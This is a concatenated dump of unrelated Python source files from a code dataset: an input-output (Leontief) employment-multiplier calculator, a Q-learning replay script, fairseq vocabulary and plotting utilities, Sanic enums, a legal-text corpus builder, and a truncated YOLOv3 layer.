vectorMatrice[p].split('#')\n productMatrix = pLst[0]\n\n if productMatrix == productP1:\n lstProdMat = lstProdMat + [productMatrix]\n vectorOutput = vectorOutput + [vectorMatrice[p]]\n setcolP1 = set(lstProdP1)\n setcolMat = set(lstProdMat) \n setColNotInMat = setcolP1 - setcolMat\n vectorReturn = vectorOutput\n if (len(setColNotInMat)>0): \n for c in setColNotInMat:\n lineProd = c + '#0'\n vectorReturn = vectorReturn + [lineProd] \n return vectorReturn\n \ndef fonctionVectorZero(vectorP1):\n vectorInput = vectorP1 \n vectorOutput = []\n for c in (range(0,len(vectorInput))):\n productLst = vectorInput[c].split('#')\n productOuput = productLst[0] + '#0'\n vectorOutput = vectorOutput + [productOuput]\n return vectorOutput \n \ndef vectorCol(colP1,colToBeP1,dicNoProduct,keyP1):\n lstProdP1 = []\n for c in (range(0,len(colP1))):\n lineProd = colP1[c].split('#')\n lstProdP1= lstProdP1 + [lineProd[0]]\n lstToBeP1 = []\n lstColAll = []\n for c in (range(0,len(colToBeP1))): \n lineProd = colToBeP1[c].split('#')\n keyNoProduct = keyP1 + \"#\" + lineProd[0]\n if dicNoProduct.has_key(keyNoProduct):\n continue\n else:\n lstToBeP1= lstToBeP1 + [lineProd[0]]\n lstColAll= lstColAll + [colToBeP1[c]] \n setcolP1 = set(lstProdP1)\n setToBeP1 = set(lstToBeP1) \n setColNotInToBeP1= setcolP1 - setToBeP1 \n if (len(setColNotInToBeP1)>0): \n for c in setColNotInToBeP1:\n lineProd = c + '#0'\n lstColAll= lstColAll + [lineProd]\n return lstColAll\n \ndef divide(x, y):#\n if (x == None):\n x=0\n else:\n x = x.split('#')\n xf= float(x[1])\n p = x[0]\n if (y == None):\n y=0\n else:\n y = y.split('#')\n yf= float(y[1])\n p = y[0]\n try: \n tot=xf/yf\n except:\n tot=0 \n valR = tot \n return valR\n \n# compute the Leontief matrix\ndef traitementMatriceA(keyP1, matriceA, dicRealP1, mVector):\n\tnbrEle = len(matriceA)\n\tmatriceIdentity = identity(nbrEle) # create the identity matrix (1s on the diagonal)\n\tmatrixIA = matriceIdentity - matriceA # subtract matrix A from the identity\n\tmatriceL = inv(matrixIA) # invert matrix IA to obtain the Leontief matrix\n\tmmult = dot(mVector,matriceL) # multiply mVector by matriceL\n\t#mmult = matriceL.dot(mVector)\n\tdiagM = diag( mmult,k=0) # diagonalize the result \n\tMMult = dot(diagM,matriceL)\n\t#sumMMult = MMult.sum(axis=0) # column sums of the matrix into a table (axis=0) \n\t# Result \n\tlstKeyP1 = keyP1.split(\"#\")\n\tcodeCountry = lstKeyP1[0]\n\tyyyy = lstKeyP1[1]\n\tligne = 'New;Employment multiplier for ;lmult;'+str(codeCountry)+';'+str(yyyy)+'\\n'\n\tfileOutput.write(ligne) \n \n\t#nameFile = codeCountry+yyyy\n\t#fileMatrice = open(dirCSV + '\\\\matrixL_R2_' + nameFile +'.csv', 'w')\n\t#ligne = 'Matrix L for '+str(codeCountry)+','+str(yyyy)+'\\n'\n\t#fileMatrice.write(ligne)\n\t# line of product names per country/year\n\t#ligne = codeCountry+\",\"+yyyy\n\t# header of the CPA codes\n\tligne = 'Code;'\n\tl = 0\n\ttabCode = []\n\tdicRealP1[keyP1]['P1'].sort()\n\tfor n in dicRealP1[keyP1]['P1']:\n\t\tcodeProd = n.split(\"#\")\n\t\tligne = ligne+str(codeProd[0])+\",\"\n\t\ttabCode.append(codeProd[0]) \n\tfileOutput.write(ligne[0:-1]+'\\n')\n\t'''\n\t# body of the matrix\n\tfor l in range(0,nbrEle):\n\t\tligne=tabCode[l]+';'\n\t\tfor c in range(0,nbrEle):\n\t\t\tligne = ligne+str(matriceL[l,c])+\",\" \n\t\t\t#ligne = ligne+\",\" + str(MMult[l,c]) \n\t\tfileOutput.write(ligne[0:-1]+'\\n') \n\t# line of product values per country/year \n\t#ligne = codeCountry+\",\"+yyyy\n\t# total value \n\n\tligne='techlmult;'\n\tfor i in range(0,len(mVector)):\n\t\tligne = ligne+str(mVector[i])+\",\" \n\tfileOutput.write(ligne[0:-1]+'\\n') \n\t''' \n\tligne='default;'\n\tfor i in range(0,len(mmult)):\n\t\tligne = ligne+str(mmult[i])+\",\" \n\tfileOutput.write(ligne[0:-1]+'\\n') \n \ndef traitementMatrice(dicRealP1, dicMatrice, dicNoProduct):\n codeP1 = dicRealP1.keys() \n codeP1.sort()\n mVector = [] \n for keyP1 in codeP1: #key = country,year\n nbrEleP1 = len(dicRealP1[keyP1]['P1'])\n matriceA = zeros((nbrEleP1,nbrEleP1), dtype=float)\n ligne = 0\n col = 0\n dicRealP1[keyP1]['P1'].sort()\n dicRealP1[keyP1]['EMP'].sort()\n colP1 = dicRealP1[keyP1]['P1']\n colToBeP1 = dicRealP1[keyP1]['EMP']\n if (len(colP1)!=len(colToBeP1)):\n fileLog.write('nbr product P1 ='+str(len(colP1))+' nbr product EMP ='+str(len(colToBeP1))+' for '+str(keyP1)+'\\n') \n colEmp = vectorCol(colP1,colToBeP1,dicNoProduct,keyP1) # the function builds a vector with ALL the columns\n colP1.sort()\n colEmp.sort()\n vectorP1 = dicRealP1[keyP1]['P1']\n vectorZero = fonctionVectorZero(vectorP1) \n mVector = map(divide, colEmp, colP1) \n for productLst in 
dicRealP1[keyP1]['P1']:#each entry is a list with the product code and the value \n productLst = productLst.split('#')\n productP1 = productLst[0]\n valueP1 = float(productLst[1])\n keyMatriceP1 = keyP1 + '#' + productP1\n ligne = 0\n if dicNoProduct.has_key(keyMatriceP1): \n continue\n else:\n try:# the matrix row is in P1\n dicMatrice[keyMatriceP1].sort()\n vectorMatrice = dicMatrice[keyMatriceP1]\n except:#the row is in P1 but NOT in the matrix, we use a vector of 0 values e.g. T for EE\n vectorMatrice = vectorZero\n fileLog.write('le produit '+ productP1+ ' existe dans P1 mais pas dans la MATRICE = '+keyP1+'\\n') \n vectorP1 = dicRealP1[keyP1]['P1']\n #avoids misalignments between P1 and the Matrix: a column can exist in P1 but not in the matrix\n #in that case we add a column of zeros\n ligneAtraiter = vectorAtraiter(vectorMatrice, vectorP1) \n ligneAtraiter.sort() \n for ligneMatrice in ligneAtraiter:#WARNING: EACH ENTRY CORRESPONDS TO THE ELEMENTS OF ONE row\n ligneMatrice = ligneMatrice.split('#')\n product = ligneMatrice[0] \n value = float(ligneMatrice[1])\n keyNoProduct = keyP1 + \"#\" + product \n if dicNoProduct.has_key(keyNoProduct): \n continue\n #we compute matrix A, the matrix of technical coefficients\n else:\n if (ligne < nbrEleP1):#the number of elements in the row must be the same as in P1 \n matriceA[ligne,col] = value/valueP1\n ligne+=1\n else:\n fileLog.write('Probleme matrice: nbrLigne > nbrEleP1 '+keyMatriceP1+',Col='+str(col)+',ligne='+str(ligne)+',maxEle='+str(nbrEleP1)+',nbr produits dans Matrice Produit(nbr Ligne)='+str(len(dicMatrice[keyMatriceP1]))+'\\n')\n if (col < nbrEleP1): \n col+=1\n else:\n fileLog.write('Probleme matrice: nbrColonne > nbrEleP1 '+keyMatrice+',Col='+str(col)+',ligne='+str(ligne)+',maxEle='+str(nbrEleP1)+'\\n')\n #print keyP1, 'len(matriceA)=',len(matriceA), ' len( dicRealP1)=' ,len(dicRealP1) , ' len( mVector)=' ,len(mVector), mVector[len(mVector)-1] \n traitementMatriceA(keyP1, matriceA, dicRealP1, mVector)\n \ndef readFileEMP(dicMatriceP1Row,dicGeoYearProd):\n\tfichierInput = open(fichierEMP,'r')\n\trec1er = fichierInput.readline() #1st record, with the metadata\n\trecMeta = rec1er.split(',')\n\trecGeoTime = recMeta[4].strip('\\n').split('\\t')\n\t#unit,nace_r2,indic_na,sector,geo\\time\t2012-1970 \n\tfor ligneCSV in fichierInput:\n\t\tligneCSV = ligneCSV.replace(':','0') \n\t\tligne = ligneCSV.split(',') \n\t\tunit = ligne[0].strip()\n\t\tnace_r2 = ligne[1].strip()\n\t\tindic_na = ligne[2].strip()\n\t\tsector = ligne[3].strip() \n\t\tligneGeoTime = ligne[4].strip('\\n').split('\\t')\n\t\tgeo = ligneGeoTime[0].strip() \n\t\tif (geo == 'FI' or geo =='NL'):\n\t\t\tif (unit == '1000PERS')and(nace_r2 != 'TOTAL')and(indic_na == 'EMP')and(sector == 'S1'): \n\t\t\t\tfor i in range(1,len(recGeoTime)): #metadata record, we loop over the years\n\t\t\t\t\tyy = recGeoTime[i].strip() #metadata record\n\t\t\t\t\tkeyGeoYY = geo + '#' + yy\n\t\t\t\t\tcol = nace_r2\n\t\t\t\t\tkeyGeoYearProd = geo+yy+col\n\t\t\t\t\tif dicGeoYearProd.has_key(keyGeoYearProd): #we check that each row contains the products of the P1 columns \n\t\t\t\t\t\tvalue = col + '#' + ligneGeoTime[i].strip()\n\t\t\t\t\t\tkeyProd = 'EMP' \n\t\t\t\t\t\tif dicMatriceP1Row.has_key(keyGeoYY):\n\t\t\t\t\t\t\tif dicMatriceP1Row[keyGeoYY].has_key(keyProd):\n\t\t\t\t\t\t\t\tdicMatriceP1Row[keyGeoYY][keyProd] = dicMatriceP1Row[keyGeoYY][keyProd] + [value] \n\t\t\t\t\t\t\telse: \n\t\t\t\t\t\t\t\tdicMatriceP1Row[keyGeoYY][keyProd] 
= [value]\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tdicMatriceP1Row[keyGeoYY] = {} #we create a new dictionary for the (value, product) pair per product row\n\t\t\t\t\t\t\tdicMatriceP1Row[keyGeoYY][keyProd] = [value] \n\tfichierInput.close()\n\treturn dicMatriceP1Row \n#unit,t_cols2,t_rows2,geo\\time\t2010 \t2009 \t2008 \t2005 \t2000 \t1995 \ndef traitementFichierCSV():\n\tdicMatrice = {}\n\tdicP1 = {}\n\tdicMatriceP1Row = {} \n\tdicSelectEMP = {}\n\tdicEMP = {}\n\tdicGeoYearProd = {} \n\tdicRealP1 = {}\n\tdicNoProduct = {}\n\tdicNace\t\t = {}\n\t#dicNace\t\t\t =\tDBAccess.dicNace('nace2','NAMA','0')\n\tdicNace\t\t\t =\tFileAccessMatrix.dicNace('nace2',dirTXT)\n\tfichierInput = open(fichierCSV,'r')\n\trec1er = fichierInput.readline() #1st record, with the metadata\n\trecMeta = rec1er.split(',')\n\trecGeoTime = recMeta[3].strip('\\n').split('\\t')\n \n\t#MIO_EUR,CPA_A01,B1G,AT\t: \t1963.57 \t2455.13 \t: \t: \t: \n\tfor ligneCSV in fichierInput:\n\t\tligneCSV = ligneCSV.replace(':','0') \n\t\tligne = ligneCSV.split(',') \n\t\tunit = ligne[0].strip()\n\t\tcol = ligne[1].strip()\n\t\trow = ligne[2].strip()\n\t\tligneGeoTime = ligne[3].strip('\\n').split('\\t')\n\t\tgeo = ligneGeoTime[0].strip()\n\t\tif (unit == 'MIO_EUR') and (geo == 'FI' or geo =='NL'):\n\t\t\t#we put each product row into a dictionary\n\t\t\tif\tdicNace.has_key(col) and dicNace.has_key(row) and (col != 'TOTAL') and (row != 'TOTAL'):\t\t\t\n\t\t\t\tfor i in range(1,len(recGeoTime)): #metadata record, we loop over the years\n\t\t\t\t\tyy = recGeoTime[i].strip() #metadata record \n\t\t\t\t\tkeyMatrice = geo + '#' + yy + '#' + col\n\t\t\t\t\tvalue = row + '#' + ligneGeoTime[i].strip()\n\t\t\t\t\tif dicMatrice.has_key(keyMatrice): # WARNING: EACH ENTRY CORRESPONDS TO THE ELEMENTS OF ONE COLUMN\n\t\t\t\t\t\tdicMatrice[keyMatrice] = dicMatrice[keyMatrice] + [value]\n\t\t\t\t\telse:\n\t\t\t\t\t\tdicMatrice[keyMatrice] = [value]\n\t\t\tif row == 'P1'and dicNace.has_key(col) and col != 'TOTAL': \t\t\t\n\t\t\t\tfor i in range(1,len(recGeoTime)): #metadata record, we loop over the years\n\t\t\t\t\tyy = recGeoTime[i].strip() #metadata record\n\t\t\t\t\tkeyGeoYY = geo + '#' + yy \n\t\t\t\t\tvalue = col + '#' + ligneGeoTime[i].strip()\n\t\t\t\t\tkeyProd = row\n\t\t\t\t\tkeyGeoYearProd = geo+yy+col\n\t\t\t\t\tdicGeoYearProd[keyGeoYearProd] = keyGeoYearProd\n\t\t\t\t\tif dicMatriceP1Row.has_key(keyGeoYY):\n\t\t\t\t\t\tif dicMatriceP1Row[keyGeoYY].has_key(keyProd):\n\t\t\t\t\t\t\tdicMatriceP1Row[keyGeoYY][keyProd] = dicMatriceP1Row[keyGeoYY][keyProd] + [value] \n\t\t\t\t\t\telse: \n\t\t\t\t\t\t\tdicMatriceP1Row[keyGeoYY][keyProd] = [value]\n\t\t\t\t\telse:\n\t\t\t\t\t\tdicMatriceP1Row[keyGeoYY] = {} #we create a new dictionary for the (value, product) pair per product row\n\t\t\t\t\t\tdicMatriceP1Row[keyGeoYY][keyProd] = [value]\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t \n\tfichierInput.close()\n\t#we complete the P1 dictionary with the EMP part coming from the naio_cp19_r2.tsv file \n\tlen(dicGeoYearProd) \n\tdicMatriceP1Row = readFileEMP(dicMatriceP1Row,dicGeoYearProd) \n\tdicKeyP1Row = dicMatriceP1Row.keys()\n\tdicKeyP1Row.sort()\n\n #SELECTION OF THE MATRICES TO PROCESS \n\tfor keyP1 in dicKeyP1Row: #key = country,year\n\t\tmatriceVide = 1 # we assume the matrix is empty at the start\n\t\tL68_test = 0\n\t\tentryL68EMP = 'L68#0'\n\t\tentryL68AEMP = 'L68A#0' \n\t\tentryL68BEMP = 'L68B#0'\n\t\tentryL68P1 = 'L68#0'\n\t\tentryL68AP1 = 'L68A#0' \n\t\tentryL68BP1 = 'L68B#0' 
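\n\t\t# L68_test is a decimal flag: +100 when L68 has a value, +10 for L68A, +1 for L68B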
\n\t\tdicRealP1[keyP1] = {} # dictionary with the P1 matrices to process \n\t\t#we make sure the P1 list is in the right order \n\t\tkeyRow = 'P1'\n\t\tdicMatriceP1Row[keyP1][keyRow].sort()#we sort the list of P1 products \n\t\tdicRealP1[keyP1][keyRow] = []\n\n\t\tfor productLst in dicMatriceP1Row[keyP1][keyRow]:#each entry is a list with the product code and the value \n\t\t\tproductLst = productLst.split('#')\n\t\t\tproduct = productLst[0]\n\t\t\tvalue = productLst[1]\n\t\t\tif (value != '0'):\n\t\t\t\tmatriceVide = 0 #the matrix will not be empty, at least one column is filled\n\t\t\t\tif (product == 'L68'):\n\t\t\t\t\tL68_test = 100\n\t\t\t\t\tentryL68P1 = product + '#' + value \n\t\t\t\t\tcontinue\n\t\t\t\tif (product == 'L68A'):\n\t\t\t\t\tL68_test = L68_test + 10 \n\t\t\t\t\tentryL68AP1 = product + '#' + value \n\t\t\t\t\tcontinue \n\t\t\t\tif (product == 'L68B'):\n\t\t\t\t\tL68_test = L68_test + 1\n\t\t\t\t\tentryL68BP1 = product + '#' + value \n\t\t\t\t\tcontinue\n\t\t\t\tentryP1 = product + '#' + value\n\t\t\t\tdicRealP1[keyP1][keyRow] = dicRealP1[keyP1][keyRow] + [entryP1] \n\t\t\telse:\n\t\t\t\tif (matriceVide == 0): #if the matrix is not empty then we remove the cols/rows that have no value\n\t\t\t\t\t\t\t\t\t\t#we do this test to keep the logfile from also filling up with all the empty\n\t\t\t\t\t\t\t\t\t\t#columns of an empty matrix\n\t\t\t\t\tkeyNoProduct = keyP1 + \"#\" + product \n\t\t\t\t\tdicNoProduct[keyNoProduct] = product #we will not process the row with the zero value \n\t\t\t\t\tfileLog.write('Colonne vide pour matrice = ' + keyNoProduct +' keyRow='+keyRow +'\\n') \n\t\t#we only process the matrices that have an EMP row \n\t\tkeyRow = 'EMP'\n\t\tdicMatriceP1Row[keyP1][keyRow].sort() \n\t\tdicRealP1[keyP1][keyRow] = []\n\t\tfor productLst in dicMatriceP1Row[keyP1][keyRow]:#each entry is a list with the product code and the value \n\t\t\tproductLst = productLst.split('#')\n\t\t\tproduct = productLst[0]\n\t\t\tvalue = productLst[1]\n\t\t\tif (value != '0'): \n\t\t\t\tif (product == 'L68'): \n\t\t\t\t\tentryL68EMP = product + '#' + value\n\t\t\t\t\tcontinue\n\t\t\t\tif (product == 'L68A'): \n\t\t\t\t\tentryL68AEMP = product + '#' + value\n\t\t\t\t\tcontinue \n\t\t\t\tif (product == 'L68B'):\n\t\t\t\t\tentryL68BEMP = product + '#' + value\n\t\t\t\t\tcontinue\n\t\t\t\tentryP1 = product + '#' + value\n\t\t\t\tdicRealP1[keyP1][keyRow] = dicRealP1[keyP1][keyRow] + [entryP1] \n\t\t\t\t\t\t\t \n\t\t#handling of the L68 cases\n\t\tif (L68_test == 111):\n\t\t\tdicRealP1[keyP1]['P1'] = dicRealP1[keyP1]['P1'] + [entryL68AP1] + [entryL68BP1]\n\t\t\tdicRealP1[keyP1]['EMP'] = dicRealP1[keyP1]['EMP'] + [entryL68AEMP] + [entryL68BEMP] \n\t\t\tkeyNoProduct = keyP1 + \"#L68\" \n\t\t\tdicNoProduct[keyNoProduct] = product #we will not process the row with the zero value \n\t\t\tfileLog.write('Colonne L68 enleve pour matrice = ' + keyP1 +'\\n') \n\t\tif (L68_test == 110):\n\t\t\tdicRealP1[keyP1]['P1'] = dicRealP1[keyP1]['P1'] + [entryL68P1]\n\t\t\tdicRealP1[keyP1]['EMP'] = dicRealP1[keyP1]['EMP'] + [entryL68EMP] \n\t\t\tkeyNoProduct = keyP1 + \"#L68A\" \n\t\t\tdicNoProduct[keyNoProduct] = product #we will not process the row with the zero value \n\t\t\tfileLog.write('Colonne L68A enleve pour matrice = ' + keyP1 +'\\n') \n\t\tif (L68_test == 101):\n\t\t\tdicRealP1[keyP1]['P1'] = dicRealP1[keyP1]['P1'] + [entryL68BP1]\n\t\t\tdicRealP1[keyP1]['EMP'] = dicRealP1[keyP1]['EMP'] + [entryL68BEMP] \n\t\t\tkeyNoProduct = keyP1 + \"#L68\" 
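\n\t\t\t# case 101: L68 and L68B carry values but L68A does not, so keep the L68B entry and drop the aggregate L68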
\n\t\t\tdicNoProduct[keyNoProduct] = product #we will not process the row with the zero value \n\t\t\tfileLog.write('Colonne L68 enleve pour matrice = ' + keyP1 +'\\n')\n\t\tif (L68_test == 100): \n\t\t\tdicRealP1[keyP1]['P1'] = dicRealP1[keyP1]['P1'] + [entryL68P1]\n\t\t\tdicRealP1[keyP1]['EMP'] = dicRealP1[keyP1]['EMP'] + [entryL68EMP] \n\t\tif (L68_test == 11):\n\t\t\tdicRealP1[keyP1]['P1'] = dicRealP1[keyP1]['P1'] + [entryL68AP1] + [entryL68BP1]\n\t\t\tdicRealP1[keyP1]['EMP'] = dicRealP1[keyP1]['EMP'] + [entryL68AEMP] + [entryL68BEMP] \n\t\tif (L68_test == 10):\n\t\t\tdicRealP1[keyP1]['P1'] = dicRealP1[keyP1]['P1'] + [entryL68AP1]\n\t\t\tdicRealP1[keyP1]['EMP'] = dicRealP1[keyP1]['EMP'] + [entryL68AEMP] \n\t\tif (L68_test == 1):\n\t\t\tdicRealP1[keyP1]['P1'] = dicRealP1[keyP1]['P1'] + [entryL68BP1]\n\t\t\tdicRealP1[keyP1]['EMP'] = dicRealP1[keyP1]['EMP'] + [entryL68BEMP] \n\t\tif (matriceVide): #the matrix is empty if all the P1 values are empty\n\t\t\tmatriceVide = 0\n\t\t\tdel dicRealP1[keyP1] #we remove the useless references to empty matrices \n\t\t\tfileLog.write('Matrice Vide = ' + keyP1 + '\\n') \n\t#PROCESSING OF THE MATRICES \n\ttraitementMatrice(dicRealP1, dicMatrice, dicNoProduct)\n \ntraitementFichierCSV()\nfileOutput.close()\nfileLog.close() ","sub_path":"procpy/source/matrixLmultI.py","file_name":"matrixLmultI.py","file_ext":"py","file_size_in_byte":20490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"357053826","text":"import numpy as np\nimport sys\nimport os\nimport time\nimport gym\n\n\ndiscrete_obs_win_size = 40\n\n\ndef get_discrete_state(state):\n dc_state = (state - env.observation_space.low) / discrete_obs_win_size\n return tuple(dc_state.astype(np.int))\n\n\nif __name__ == \"__main__\":\n numbers = np.linspace(0, 49990, 5)\n\n env = gym.make('MountainCar-v0')\n\n for num in numbers:\n file = f\"{int(num)}-qtable.npy\"\n file_path = f\"qtables_22/{file}\"\n print(f\"path: {file_path}\")\n q_table = np.load(file_path, allow_pickle=True)\n\n step = 0\n discrete_state = get_discrete_state(env.reset())\n\n done = False\n while not done:\n\n action = np.argmax(q_table[discrete_state])\n new_state, reward, done, _ = env.step(action)\n time.sleep(0.03)\n step += 1\n\n","sub_path":"gym-train/sentdex/q-learning/record_game.py","file_name":"record_game.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"163054161","text":"\n\ndef reorg(fname, output_fname, start_idx=0):\n with open(fname, 'rt') as f:\n lines = f.readlines()\n \n #output_lines = [\"<s> -1\", \"<pad> -1\", \"</s> -1\", \"<unk> -1\"]\n# output_lines = [\"<s> -1 #fairseq:overwrite\", \n# \"<pad> -1 #fairseq:overwrite\", \n# \"</s> -1 #fairseq:overwrite\", \n# \"<unk> -1 #fairseq:overwrite\"]\n output_lines = []\n for i, line in enumerate(lines[start_idx:]):\n token, nll = line.split()\n output_lines.append('{} {}'.format(token, i))\n\n with open(output_fname, 'wt') as f:\n f.writelines('\\n'.join(output_lines))\n\n\nif __name__ == '__main__':\n# fname = \"/workspace/models/vocabs/spm/libri.16k.vocab\"\n# output_fname = \"libri.16k.fairvocab\"\n# reorg(fname, output_fname, 4)\n import sys\n fname = sys.argv[1]\n output_fname = sys.argv[2]\n reorg(fname, output_fname, 
4)\n\n","sub_path":"preprocess_for_fairseq/reorganize_dict.py","file_name":"reorganize_dict.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"603231044","text":"import pandas as pd\nfrom datetime import datetime\nimport csv\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport matplotlib.patches as mpatches\n\nheaders = ['Benchmark','Supplier','Size','Score']\ndf = pd.read_csv('data.csv',names=headers)\n\ni = 0\nfor benchmark, df_benchmark in df.groupby('Benchmark'):\n for size, df_size in df_benchmark.groupby('Size'):\n print(df_size)\n plt.bar(df_size['Supplier'], df_size['Score'])\n\n benchmark_patch = mpatches.Patch(label=benchmark)\n size_patch = mpatches.Patch(label=size)\n plt.legend(handles=[benchmark_patch, size_patch])\n\n i += 1\n\n # rotate labels\n plt.gcf().subplots_adjust(bottom=0.5)\n plt.xticks(rotation=90)\n plt.savefig(str(i))\n #plt.show()\n plt.clf()\n","sub_path":"lab2/charts/plotter/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"560318014","text":"from enum import IntEnum, auto\n\nfrom sanic.compat import UpperStrEnum\n\n\nclass RestartOrder(UpperStrEnum):\n SHUTDOWN_FIRST = auto()\n STARTUP_FIRST = auto()\n\n\nclass ProcessState(IntEnum):\n IDLE = auto()\n RESTARTING = auto()\n STARTING = auto()\n STARTED = auto()\n ACKED = auto()\n JOINED = auto()\n TERMINATED = auto()\n","sub_path":"sanic/worker/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"34792321","text":"#!/usr/bin/env python3\n# coding: utf-8\n# File: export_data.py\n# Author: lhy\n# Date: 18-8-8\n\nimport jieba\nimport os\nimport random\nimport re\n\n\nclass LawCorpusGen:\n def __init__(self):\n\n self.lawsuit_path = '../corpus_lawsuit'\n\n self.src_train = 'src_train.txt'\n self.tgt_train = 'tgt_train.txt'\n self.src_val = 'src_val.txt'\n self.tgt_val = 'tgt_val.txt'\n self.unk_flag = '<unk>' # '<unk>' is an assumed unknown-token placeholder\n\n self.train_rate = 0.9\n self.words_threshold = 0.8\n\n self.vocab = dict()\n self.contents = list()\n\n def words_seg(self, line):\n return [word for word in jieba.cut(line)]\n\n def is_word(self, char):\n return u'\\u4e00' <= char <= u'\\u9fff'\n\n def content_filter(self, content):\n if len(content) == 0:\n return None\n content_filted = list()\n words_seg = self.words_seg(content)\n word_num = 0\n for word in words_seg:\n if self.is_word(word):\n word_num += 1\n content_filted.append(word)\n else:\n content_filted.append(self.unk_flag)\n if word_num/len(words_seg) >= self.words_threshold:\n return content_filted\n else:\n return None\n\n def file_filter(self):\n for file in os.listdir(self.lawsuit_path):\n file_path = os.path.join(self.lawsuit_path, file)\n f = open(file_path, 'r')\n for line in f:\n if line.startswith('category') or line.startswith('title') \\\n or line.startswith('publictime') or line.startswith('content'):\n continue\n contents = re.split('。|!|?|,|:|、|;|(|)', line.strip())\n for content in contents:\n content_filted = self.content_filter(content)\n if content_filted:\n self.contents.append(content_filted)\n f.close()\n return\n\n def vocab_gen(self):\n for content in self.contents:\n for word in content:\n if word in self.vocab:\n self.vocab[word] += 1\n else:\n self.vocab[word] = 1\n print('vocab size =', 
len(self.vocab))\n\n return\n\n def vocab_write(self):\n f = open('vocab.txt', 'w')\n sorted_vocab = sorted(zip(self.vocab.values(), self.vocab.keys()), reverse=True)\n for freq, word in sorted_vocab:\n f.write(word + '\\t' + str(freq) + '\\n')\n\n f.close()\n return\n\n def corpus_gen(self):\n src_train_f = open(self.src_train, 'w')\n tgt_train_f = open(self.tgt_train, 'w')\n src_val_f = open(self.src_val, 'w')\n tgt_val_f = open(self.tgt_val, 'w')\n\n for words in self.contents:\n if len(words) < 2:\n continue\n rand_seed = random.random()\n if rand_seed <= self.train_rate:\n for i in range(1, len(words)):\n src_train_f.write(' '.join(words[:i]) + '\\n')\n tgt_train_f.write(' '.join(words[i:]) + '\\n')\n else:\n for i in range(1, len(words)):\n src_val_f.write(' '.join(words[:i]) + '\\n')\n tgt_val_f.write(' '.join(words[i:]) + '\\n')\n\n src_train_f.close()\n tgt_train_f.close()\n src_val_f.close()\n tgt_val_f.close()\n\n return\n\n\ngener = LawCorpusGen()\ngener.file_filter()\ngener.vocab_gen()\ngener.vocab_write()\ngener.corpus_gen()\n","sub_path":"script_spider/law_corpus_gen.py","file_name":"law_corpus_gen.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"335025468","text":"# Copyright 2018 The KaiJIN Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Code from https://github.com/eriklindernoren/PyTorch-YOLOv3\n\"\"\"\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom utils.utils import build_targets, to_cpu # helpers assumed to come from the source repo's utils module\n\n\nclass YOLOLayer(nn.Module):\n \"\"\"Detection layer\"\"\"\n\n def __init__(self, anchors, num_classes, img_dim=416):\n super(YOLOLayer, self).__init__()\n self.anchors = anchors\n self.num_anchors = len(anchors)\n self.num_classes = num_classes\n self.ignore_thres = 0.5\n self.mse_loss = nn.MSELoss()\n self.bce_loss = nn.BCELoss()\n self.obj_scale = 1\n self.noobj_scale = 100\n self.metrics = {}\n self.img_dim = img_dim\n self.grid_size = 0 # grid size\n\n def compute_grid_offsets(self, grid_size, cuda=True):\n self.grid_size = grid_size\n g = self.grid_size\n FloatTensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor\n self.stride = self.img_dim / self.grid_size\n # Calculate offsets for each grid\n self.grid_x = torch.arange(g).repeat(\n g, 1).view([1, 1, g, g]).type(FloatTensor)\n self.grid_y = torch.arange(g).repeat(\n g, 1).t().view([1, 1, g, g]).type(FloatTensor)\n self.scaled_anchors = FloatTensor(\n [(a_w / self.stride, a_h / self.stride) for a_w, a_h in self.anchors])\n self.anchor_w = self.scaled_anchors[:, 0:1].view(\n (1, self.num_anchors, 1, 1))\n self.anchor_h = self.scaled_anchors[:, 1:2].view(\n (1, self.num_anchors, 1, 1))\n\n print(self.grid_x.shape, self.grid_y.shape, self.anchor_w.shape, self.anchor_h.shape)\n print(self.grid_x)\n\n def forward(self, x, targets=None, img_dim=None):\n\n # Tensors for cuda support\n FloatTensor = 
torch.cuda.FloatTensor if x.is_cuda else torch.FloatTensor\n LongTensor = torch.cuda.LongTensor if x.is_cuda else torch.LongTensor\n ByteTensor = torch.cuda.ByteTensor if x.is_cuda else torch.ByteTensor\n\n self.img_dim = img_dim\n num_samples = x.size(0)\n grid_size = x.size(2)\n\n\n prediction = (\n x.view(num_samples, self.num_anchors,\n self.num_classes + 5, grid_size, grid_size)\n .permute(0, 1, 3, 4, 2)\n .contiguous()\n )\n print(x.shape, prediction.shape)\n\n # Get outputs\n x = torch.sigmoid(prediction[..., 0]) # Center x\n y = torch.sigmoid(prediction[..., 1]) # Center y\n w = prediction[..., 2] # Width\n h = prediction[..., 3] # Height\n pred_conf = torch.sigmoid(prediction[..., 4]) # Conf\n pred_cls = torch.sigmoid(prediction[..., 5:]) # Cls pred.\n\n # If grid size does not match current we compute new offsets\n if grid_size != self.grid_size:\n self.compute_grid_offsets(grid_size, cuda=x.is_cuda)\n\n # Add offset and scale with anchors\n pred_boxes = FloatTensor(prediction[..., :4].shape)\n pred_boxes[..., 0] = x.data + self.grid_x\n pred_boxes[..., 1] = y.data + 